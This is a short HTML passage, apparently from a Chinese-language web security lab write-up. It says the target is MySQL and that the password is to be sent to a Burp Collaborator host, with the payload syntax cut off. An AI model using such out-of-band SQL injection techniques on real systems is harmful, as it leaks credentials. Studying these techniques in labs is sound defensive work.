\u76ee\u6a19\u70bamysql\uff0c\u5617\u8a66\u5c07\u5bc6\u78bc\u50b3\u9001\u5230cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net<\/code>\uff0c\u8a9e\u6cd5\u5982\u4e0b<\/p>\n\n\n\n